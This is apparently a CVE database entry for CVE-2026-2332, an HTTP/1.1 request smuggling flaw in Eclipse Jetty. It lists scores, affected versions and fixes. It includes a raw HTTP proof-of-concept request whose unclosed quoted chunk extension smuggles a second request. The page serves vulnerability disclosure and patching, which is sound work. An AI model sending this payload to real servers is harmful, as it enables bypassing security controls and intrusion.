cbcvebase.
CVE-2026-2332
published 2026-04-14

CVE-2026-2332: In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined…

PriorityP354critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EPSS
1.13%
62.3th percentile
In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
* https://w4ke.info/2025/06/18/funky-chunks.html

* https://w4ke.info/2025/10/29/funky-chunks-2.html


Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.


POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked

1;ext="val
X
0

GET /smuggled HTTP/1.1
...


Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.

Affected

10 ranges
VendorProductVersion rangeFixed in
eclipsejetty>= 10.0.0 < 10.0.2810.0.28
eclipsejetty>= 11.0.0 < 11.0.2811.0.28
eclipsejetty>= 12.0.0 < 12.0.3312.0.33
eclipsejetty>= 12.1.0 < 12.1.712.1.7
eclipsejetty>= 9.4.0 < 9.4.609.4.60
eclipse_foundationeclipse_jetty10.0.0 – 10.0.27
eclipse_foundationeclipse_jetty11.0.0 – 11.0.27
eclipse_foundationeclipse_jetty12.0.0 – 12.0.32
eclipse_foundationeclipse_jetty12.1.0 – 12.1.6
eclipse_foundationeclipse_jetty9.4.0 – 9.4.59

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
vendor_redhat7.4HIGH
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.